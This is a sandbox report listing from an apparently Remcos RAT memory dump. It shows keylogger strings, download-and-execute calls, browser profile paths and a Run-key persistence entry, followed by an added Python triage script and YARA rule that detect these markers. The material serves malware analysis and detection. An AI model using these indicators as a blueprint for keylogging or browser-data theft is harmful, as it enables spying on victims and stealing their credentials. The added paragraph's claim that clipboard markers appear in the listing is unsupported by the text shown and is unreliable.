                                    • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BC0E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B76D
                                    • GetLastError.KERNEL32 ref: 0044B796
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorFileLastWrite
                                    • String ID: PkGNG
                                    • API String ID: 442123175-263838557
                                    • Opcode ID: 482fa6ac77512a0fc819500aa413458c203250297fd7de672378db3e029a087c
                                    • Instruction ID: c865f2f287ade0309940dd9d446f9ab1351fd896516eb6f8948e0fb5ca6ebdce
                                    • Opcode Fuzzy Hash: 482fa6ac77512a0fc819500aa413458c203250297fd7de672378db3e029a087c
                                    • Instruction Fuzzy Hash: 69219435600219DFDB14CF69D980BEAB3F9EB48312F1048AAE94AD7251D734ED85CB64
                                    APIs
                                    • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405030
                                      • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                    • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415D04,?,00000001,0000004C,00000000), ref: 00405087
                                    Strings
                                    • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime
                                    • String ID: KeepAlive | Enabled | Timeout:
                                    • API String ID: 481472006-1507639952
                                    • Opcode ID: 145f269d181a8435875c36411829170d0c63d951855ea4e88e6edb1186bb4574
                                    • Instruction ID: e3b05ee6596aa2f5bef7afedc99ae4e94a3de8d8e2082a6dce2ef35069f0368d
                                    • Opcode Fuzzy Hash: 145f269d181a8435875c36411829170d0c63d951855ea4e88e6edb1186bb4574
                                    • Instruction Fuzzy Hash: 8D2104719107806BD700B736980A76F7B64E751308F44097EE8491B2E2EB7D5A88CBEF
                                    APIs
                                    • Sleep.KERNEL32 ref: 0041667B
                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166DD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DownloadFileSleep
                                    • String ID: !D@
                                    • API String ID: 1931167962-604454484
                                    • Opcode ID: 55e5d64e7b98f77c9516b1aa3147275b9d54505b18039c208d99df416d007d74
                                    • Instruction ID: 05e88009b36717a37a8ab5ea381c0ce1ab0270976c353b8abb87c8adb32aa340
                                    • Opcode Fuzzy Hash: 55e5d64e7b98f77c9516b1aa3147275b9d54505b18039c208d99df416d007d74
                                    • Instruction Fuzzy Hash: F21142716083029AC614FF72D8969AE77A4AF50348F400C7FF546531E2EE3C9949C65A
                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000), ref: 0041ADCD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: alarm.wav$hYG
                                    • API String ID: 1174141254-2782910960
                                    • Opcode ID: b1264f66081e357ea998da1c4a3710e4054d322a9d90202bb867bf05cfcdbcb2
                                    • Instruction ID: 4122455f09fb97d0238bc6f6df8f07100adf7eded08faacdf9dae369850c3b42
                                    • Opcode Fuzzy Hash: b1264f66081e357ea998da1c4a3710e4054d322a9d90202bb867bf05cfcdbcb2
                                    • Instruction Fuzzy Hash: 6401B57078831156CA04F77688166EE77959B80718F00847FF64A162E2EFBC9E59C6CF
                                    APIs
                                      • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B1AD
                                      • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                      • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                    • CloseHandle.KERNEL32(?), ref: 0040B0EF
                                    • UnhookWindowsHookEx.USER32 ref: 0040B102
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                    • String ID: Online Keylogger Stopped
                                    • API String ID: 1623830855-1496645233
                                    • Opcode ID: d2011962e6819f9b37a51f0e1cf8c7d5879c21619fea64d9aec53d325501bd1f
                                    • Instruction ID: 2c7fc3a8f12b1f8c565497f75251163d8124a4eac963031352a4caf2a1bdec21
                                    • Opcode Fuzzy Hash: d2011962e6819f9b37a51f0e1cf8c7d5879c21619fea64d9aec53d325501bd1f
                                    • Instruction Fuzzy Hash: 6F01F530600610ABD7217B35C81B7BE7B729B41304F4004BFE982265C2EBB91856C7DE
                                    APIs
                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,A4E85006,00000001,?,0043CEA5), ref: 00448CA4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String
                                    • String ID: LCMapStringEx$PkGNG
                                    • API String ID: 2568140703-1065776982
                                    • Opcode ID: 1885f0d73e679dc43364bca4b79527da2e22ca333ca41b5935a1c787a3402146
                                    • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                    • Opcode Fuzzy Hash: 1885f0d73e679dc43364bca4b79527da2e22ca333ca41b5935a1c787a3402146
                                    • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                    APIs
                                    • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
                                    • waveInAddBuffer.WINMM(?,00000020,?,00000000,00401A15), ref: 0040185F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: wave$BufferHeaderPrepare
                                    • String ID: XMG
                                    • API String ID: 2315374483-813777761
                                    • Opcode ID: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                    • Instruction ID: 6f1d19605e244f5f119b09d66236675289974365e05be472c2159163c6862827
                                    • Opcode Fuzzy Hash: db4cc151110a5f9a71eb5ce2d7546914e9eb517e880c4322ad0588f055fadbe6
                                    • Instruction Fuzzy Hash: D3016D71700301AFD7209F75EC48969BBA9FB89355701413AF409D3762EB759C90CBA8
                                    APIs
                                    • IsValidLocale.KERNEL32(00000000,kKD,00000000,00000001,?,?,00444B6B,?,?,?,?,00000004), ref: 00448BB2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LocaleValid
                                    • String ID: IsValidLocaleName$kKD
                                    • API String ID: 1901932003-3269126172
                                    • Opcode ID: 04660431652152feee489ab769ffb62c2764274a72e4b83c9e76caadb00853e6
                                    • Instruction ID: c774fcfd7954269485cc3e12fd2bed3330e0a6a7af379781e67d062e13931268
                                    • Opcode Fuzzy Hash: 04660431652152feee489ab769ffb62c2764274a72e4b83c9e76caadb00853e6
                                    • Instruction Fuzzy Hash: 9BF05230A80708FBDB016B60DC06FAE7B54CB44B12F10007EFD046B291DE799E0091ED
                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: UserProfile$\AppData\Local\Google\Chrome\
                                    • API String ID: 1174141254-4188645398
                                    • Opcode ID: 436aaf2f4919e8db7ac4fc258f207b39b4a1c8f6fc7c84df28bf50f08fcb3653
                                    • Instruction ID: 9b0ec594f197676e752fca63164bf20e3c748e9c9f1ad615e42e10c79405690b
                                    • Opcode Fuzzy Hash: 436aaf2f4919e8db7ac4fc258f207b39b4a1c8f6fc7c84df28bf50f08fcb3653
                                    • Instruction Fuzzy Hash: FEF05E30A00219A6CA04BBB69C478AF7B289910759B40017FBA01B21D3EE78994586DD
                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                    • API String ID: 1174141254-2800177040
                                    • Opcode ID: 08b04822ed6971428f4ee0f1b5576531b1655caf3e2843dc1830a10d440ec58d
                                    • Instruction ID: ebfb9b6c20c42028ef61fa2b9513503d2b9bf0243ac81fc6585c9643e3935da3
                                    • Opcode Fuzzy Hash: 08b04822ed6971428f4ee0f1b5576531b1655caf3e2843dc1830a10d440ec58d
                                    • Instruction Fuzzy Hash: F1F05E70A0021AE6CA04BBB69C478EF7B2C9910755B40017BBA01721D3FE7CA94586ED
                                    APIs
                                    • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5F7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExistsFilePath
                                    • String ID: AppData$\Opera Software\Opera Stable\
                                    • API String ID: 1174141254-1629609700
                                    • Opcode ID: 9b1d6074b97f50ec4858c5e648a4d0042a555a00805eb6ed81dbd0ba111bcdaf
                                    • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                    • Opcode Fuzzy Hash: 9b1d6074b97f50ec4858c5e648a4d0042a555a00805eb6ed81dbd0ba111bcdaf
                                    • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                    APIs
                                    • GetKeyState.USER32(00000011), ref: 0040B686
                                      • Part of subcall function 0040A41B: GetForegroundWindow.USER32 ref: 0040A451
                                      • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                      • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                      • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                      • Part of subcall function 0040A41B: GetKeyboardState.USER32(?), ref: 0040A479
                                      • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                      • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                      • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                    • String ID: [AltL]$[AltR]
                                    • API String ID: 2738857842-2658077756
                                    • Opcode ID: 973633859d93ff8360b83ac9e1d77558cdb0b7c4d5bdbb5f5e50dc46d20ac961
                                    • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                    • Opcode Fuzzy Hash: 973633859d93ff8360b83ac9e1d77558cdb0b7c4d5bdbb5f5e50dc46d20ac961
                                    • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$FileSystem
                                    • String ID: GetSystemTimePreciseAsFileTime$PkGNG
                                    • API String ID: 2086374402-949981407
                                    • Opcode ID: b67c042d7bc2b84d65cb935a06f544084891d6a740928cef279651ffc9d800ce
                                    • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                    • Opcode Fuzzy Hash: b67c042d7bc2b84d65cb935a06f544084891d6a740928cef279651ffc9d800ce
                                    • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell
                                    • String ID: !D@$open
                                    • API String ID: 587946157-1586967515
                                    • Opcode ID: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
                                    • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                    • Opcode Fuzzy Hash: 30a1d241cab23d886832e5a2cf84020a5ff996eade7e739dca91f4d882a6cfc9
                                    • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                    APIs
                                    • ___initconout.LIBCMT ref: 004555DB
                                      • Part of subcall function 00456B9D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004555E0,00000000,PkGNG,0044B61D,?,FF8BC35D,00000000,?,00000000), ref: 00456BB0
                                    • WriteConsoleW.KERNEL32(FFFFFFFE,FF8BC369,00000001,00000000,00000000,00000000,PkGNG,0044B61D,?,FF8BC35D,00000000,?,00000000,PkGNG,0044BB99,?), ref: 004555FE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ConsoleCreateFileWrite___initconout
                                    • String ID: PkGNG
                                    • API String ID: 3087715906-263838557
                                    • Opcode ID: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                    • Instruction ID: 53f4b2898eb153bde3bf118a85e4039abf363423ff24ad7888d91dc13aa78fd6
                                    • Opcode Fuzzy Hash: 4fd586c33a7e536def3848490aff3c82696797501ee569242fdde9145b290049
                                    • Instruction Fuzzy Hash: C5E0EDB0100548BBDA208B69DC29EBA3328EB00331F500369FE29C62D2EB34EC44C769
                                    APIs
                                    • GetKeyState.USER32(00000012), ref: 0040B6E0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: State
                                    • String ID: [CtrlL]$[CtrlR]
                                    • API String ID: 1649606143-2446555240
                                    • Opcode ID: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
                                    • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                    • Opcode Fuzzy Hash: 1321bbb6cc8174ef42da852326f734558715e41d50b56193fb2d1a3bfc871e5f
                                    • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                    APIs
                                      • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                    • __Init_thread_footer.LIBCMT ref: 00410F64
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Init_thread_footer__onexit
                                    • String ID: ,kG$0kG
                                    • API String ID: 1881088180-2015055088
                                    • Opcode ID: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                    • Instruction ID: 52a075922dd803dc3791164d579436726ad124eb3de8ddc986de269a183bf650
                                    • Opcode Fuzzy Hash: 9b05eae692bf82ff893255be440f7f21efe509fead0387458dc7709882e6db21
                                    • Instruction Fuzzy Hash: A8E0D8315149208EC514B729E542AC53395DB0E324B21907BF014D72D2CBAE78C28E5D
                                    APIs
                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D509,00000000,?,00000000), ref: 00413A6C
                                    • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00413A80
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteOpenValue
                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                    • API String ID: 2654517830-1051519024
                                    • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                    • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                    • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                    • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
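The marker strings recovered in the function listing above (the keylogger state messages and modifier tags, the clipboard delimiters, the KeepAlive banner, the Chrome/Edge/Opera profile paths checked with PathFileExistsW, and the Policies\Explorer\Run key touched by RegOpenKeyExW/RegDeleteValueW) can be used to triage other memory dumps for the same family. The script below is an added example and is not part of the Joe Sandbox report or of the Remcos code base: it searches a dump for those exact strings in both ASCII and UTF-16LE (the listing shows the W-suffixed APIs consuming them), groups hits by capability, and renders the same list as a YARA rule. The sample dump bytes are constructed, and the "three capability groups" threshold is an assumption, not something the report states.

```python
"""Triage helper for the Remcos marker strings in the function listing above.
Added example, not part of the Joe Sandbox report or the Remcos code base.
Scans a memory dump for the markers in both ASCII and UTF-16LE and emits a
YARA rule built from the same list.  The sample dump bytes are constructed."""
from __future__ import annotations

from dataclasses import dataclass

# Marker strings as they appear in the report's "String ID" fields, grouped by
# the capability they indicate.  Plain (non-raw) strings so the trailing
# backslashes survive.
MARKERS: dict[str, list[str]] = {
    "keylogger": ["Offline Keylogger Started", "Online Keylogger Stopped",
                  "[AltL]", "[AltR]", "[CtrlL]", "[CtrlR]"],
    "clipboard": ["[Text copied to clipboard]", "[End of clipboard]"],
    "keepalive": ["KeepAlive | Enabled | Timeout: "],
    "browser_paths": ["\\AppData\\Local\\Google\\Chrome\\",
                      "\\AppData\\Local\\Microsoft\\Edge\\",
                      "\\Opera Software\\Opera Stable\\"],
    "persistence": ["Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\"],
}


@dataclass(frozen=True)
class Hit:
    category: str
    marker: str
    encoding: str  # "ascii" or "utf-16le"
    offset: int


def find_markers(blob: bytes) -> list[Hit]:
    """Return every occurrence of every marker, in either encoding.
    The wide (UTF-16LE) form matters because the listing shows the W-suffixed
    APIs (PathFileExistsW, wsprintfW) consuming these strings."""
    hits: list[Hit] = []
    for category, strings in MARKERS.items():
        for marker in strings:
            for enc in ("ascii", "utf-16le"):
                needle = marker.encode(enc)
                pos = blob.find(needle)
                while pos >= 0:
                    hits.append(Hit(category, marker, enc, pos))
                    pos = blob.find(needle, pos + 1)
    return hits


def summarize(hits: list[Hit]) -> dict[str, list[str]]:
    """Collapse hits to {category: sorted unique markers}."""
    seen: dict[str, set[str]] = {}
    for h in hits:
        seen.setdefault(h.category, set()).add(h.marker)
    return {c: sorted(m) for c, m in seen.items()}


def verdict(hits: list[Hit], min_categories: int = 3) -> bool:
    """Assumed threshold: three distinct capability groups present counts as a
    Remcos-like dump; a single browser path alone is too generic to flag."""
    return len(summarize(hits)) >= min_categories


def yara_rule(name: str = "remcos_markers_from_report") -> str:
    """Render the same marker list as a YARA rule ('ascii wide' covers both
    encodings searched above)."""
    lines = [f"rule {name}", "{", "    strings:"]
    n = 0
    for category, strings in MARKERS.items():
        for marker in strings:
            esc = marker.replace("\\", "\\\\").replace('"', '\\"')
            lines.append(f'        $s{n} = "{esc}" ascii wide  // {category}')
            n += 1
    lines += ["    condition:", "        3 of them", "}"]
    return "\n".join(lines)


# Constructed sample dump: markers embedded in padding, mixing both encodings.
SAMPLE_DUMP = (
    b"\x00" * 16
    + "Offline Keylogger Started".encode("utf-16le")
    + b"\x00" * 8
    + "[Text copied to clipboard]".encode("utf-16le")
    + b"junk" * 4
    + b"\\AppData\\Local\\Google\\Chrome\\"
    + b"\x00" * 16
    + "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\".encode("utf-16le")
)

if __name__ == "__main__":
    found = find_markers(SAMPLE_DUMP)
    for h in found:
        print(f"{h.offset:#06x} {h.encoding:<8} {h.category:<13} {h.marker}")
    print("remcos-like:", verdict(found))
    print(yara_rule())
```

Run it against a real dump by reading the .sdmp file into bytes and passing it to find_markers(); the browser-path and persistence-key strings also occur in benign software, which is why the verdict requires several capability groups rather than any single hit.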
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D77
                                    • GetLastError.KERNEL32 ref: 00440D85
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$ErrorLast
                                    • String ID:
                                    • API String ID: 1717984340-0
                                    • Opcode ID: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                    • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                    • Opcode Fuzzy Hash: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
                                    • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                    APIs
                                    • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                    • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                    • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411CB5
                                    • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.2239296250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_400000_keHuNxIumw.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastRead
                                    • String ID:
                                    • API String ID: 4100373531-0
                                    • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                    • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                    • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                    • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99